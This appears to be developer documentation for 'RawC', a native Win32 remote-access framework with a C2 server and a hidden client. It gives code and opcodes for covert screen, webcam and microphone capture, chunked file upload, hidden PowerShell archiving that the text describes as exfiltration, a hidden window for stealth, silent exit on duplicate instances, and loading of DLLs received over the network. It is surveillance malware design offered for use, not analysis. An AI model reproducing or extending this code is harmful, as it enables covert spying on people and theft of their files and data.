RawC Framework Documentation
Welcome to the technical documentation for the native Win32 C Client/Server framework. This document details the internal architecture, memory protections, and multimedia API integrations used throughout the codebase.
Architecture Overview
The system utilizes a centralized Command & Control (C2) TCP socket architecture. The Server.cpp binds a listener and spawns worker threads for concurrent client management. The Client.cpp operates a continuous reconnection loop, parsing incoming binary opcodes to execute distinct subsystem threads (e.g., File I/O, Video Capture, Audio Capture).
Network Protocol
To avoid TCP fragmentation and buffer overflows, all communications utilize a strict header definition. The receiver parses the header to determine the exact byte length of the incoming payload before allocating memory.
// Standard Packet Header Structure
typedef struct _PACKET_HEADER {
DWORD MagicNumber; // Verification (e.g., 0xDEADBEEF)
DWORD Opcode; // Command identifier
DWORD DataLength; // Size of payload to recv()
} PACKET_HEADER, *PPACKET_HEADER;Core Opcodes
| Opcode ID | Definition | Subsystem Invoked |
|---|---|---|
0x10 | OP_START_RDP | Spawns GDI+ Capture Thread |
0x11 | OP_RDP_FRAME | Routes JPEG to MJPEG HTTP Buffer |
0x20 | OP_START_CAM | Initializes Media Foundation Graph |
0x30 | OP_START_MIC | Opens WaveIn Audio Device |
0x40 | OP_FILE_UPLOAD | Initiates Chunked TCP File Write |
0x45 | OP_DIR_ZIP | Spawns hidden PowerShell process |
0x50 | OP_INJECT_DLL | Executes memory LoadLibrary flow |
Stealth Entry & Tray Client.cpp
The client executes without a console window. It achieves persistence and process state management by registering a hidden window class and optionally placing an invisible icon in the System Tray to intercept Windows UI messages (like shutdown or sleep commands).
// WinMain Entry - Hidden Window Registration
WNDCLASSEXA wc = { sizeof(WNDCLASSEXA), 0, HiddenWndProc, 0, 0, hInstance, NULL, NULL, NULL, NULL, "HiddenTrayClass", NULL };
RegisterClassExA(&wc);
hHiddenWindow = CreateWindowExA(0, "HiddenTrayClass", "", 0, 0, 0, 0, 0, HWND_MESSAGE, NULL, hInstance, NULL);
// System Tray Initialization (Invisible)
ZeroMemory(&nid, sizeof(NOTIFYICONDATAA));
nid.cbSize = sizeof(NOTIFYICONDATAA);
nid.hWnd = hHiddenWindow;
nid.uID = 1;
nid.uFlags = NIF_ICON | NIF_MESSAGE;
nid.uCallbackMessage = WM_USER + 1;
Shell_NotifyIconA(NIM_ADD, &nid);Memory & Mutex Protections
To prevent multiple instances of the client from running and colliding on the same machine, a named Mutex is created immediately upon execution. Furthermore, critical sections are used to prevent overlapping socket writes (Double-Free/Race Condition protection).
void CheckMutex() {
CreateMutexA(NULL, TRUE, "xeno_native_mutex");
if (GetLastError() == ERROR_ALREADY_EXISTS) {
ExitProcess(0); // Silently terminate duplicate
}
}
// Thread-safe networking
CRITICAL_SECTION sendCS;
InitializeCriticalSection(&sendCS);
// ... inside send function:
EnterCriticalSection(&sendCS);
send(currentSock, buffer, length, 0);
LeaveCriticalSection(&sendCS);GDI+ Remote Desktop
Desktop capture relies on the GDI API. GetDC(NULL) acquires the screen handle. To minimize bandwidth, the raw bitmap is passed to the Gdiplus API, which hardware-encodes the frame into a compressed JPEG buffer in memory before network transmission.
Hardware Webcams (MF API)
Unlike older frameworks that use the deprecated `avicap32.dll`, this codebase implements the modern Media Foundation (MF) API. This provides hardware-accelerated access to connected webcams, allowing for high-framerate, YUY2-to-JPEG conversion directly on the GPU.
// Required Initialization for Webcam Module
MFStartup(MF_VERSION);
IMFAttributes* pConfig = NULL;
MFCreateAttributes(&pConfig, 1);
pConfig->SetGUID(MF_DEVSOURCE_ATTRIBUTE_SOURCE_TYPE, MF_DEVSOURCE_ATTRIBUTE_SOURCE_TYPE_VIDCAP_GUID);
// Enumerate Devices
IMFActivate** ppDevices = NULL;
UINT32 count = 0;
MFEnumDeviceSources(pConfig, &ppDevices, &count);Live Audio (WaveIn)
The audio pipeline utilizes the mmsystem.h Wave API. The client allocates rolling buffers, submits them to the microphone via waveInAddBuffer, and transmits the raw PCM byte arrays to the server upon the WIM_DATA callback.
Chunked File Manager
Large files (gigabytes in size) cannot be sent in a single socket call. The framework implements a Chunked TCP file transfer loop. The file is opened using CreateFileA, read in chunks (e.g., 64KB), and sent with sequence headers until EOF is reached.
PowerShell Auto-Zipping
To exfiltrate or download entire directories efficiently, the framework avoids writing a complex C zipping library. Instead, it utilizes the Windows native environment by spawning a hidden PowerShell process using CreateProcessA with the CREATE_NO_WINDOW flag.
// Constructed command line executed silently
char* cmd = "powershell.exe -WindowStyle Hidden -Command Compress-Archive -Path 'C:\\Target\\*' -DestinationPath 'C:\\Temp\\out.zip' -Force";Dynamic DLL Injection
The framework acts as a modular stub. It can receive a compiled DLL file over the network, save it to a temporary directory (or hold it in memory), and dynamically load it into its own process space using standard Win32 APIs, thereby extending the client's capabilities without recompiling.
// Dynamic Plugin Loading
HMODULE hPlugin = LoadLibraryA("C:\\Temp\\plugin.dll");
if (hPlugin != NULL) {
typedef void (*PluginEntryFunc)();
PluginEntryFunc Entry = (PluginEntryFunc)GetProcAddress(hPlugin, "StartPlugin");
if (Entry) {
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Entry, NULL, 0, NULL);
}
}HTTP MJPEG Server Server.cpp
The Server instance simultaneously acts as a bridge. While it receives proprietary TCP packets containing JPEG frames from the Client, it listens on port 8080 for HTTP GET requests. It wraps the incoming JPEGs in a multipart/x-mixed-replace HTTP header, allowing operators to view the live desktop or webcam feeds seamlessly in Chrome, Firefox, or Safari.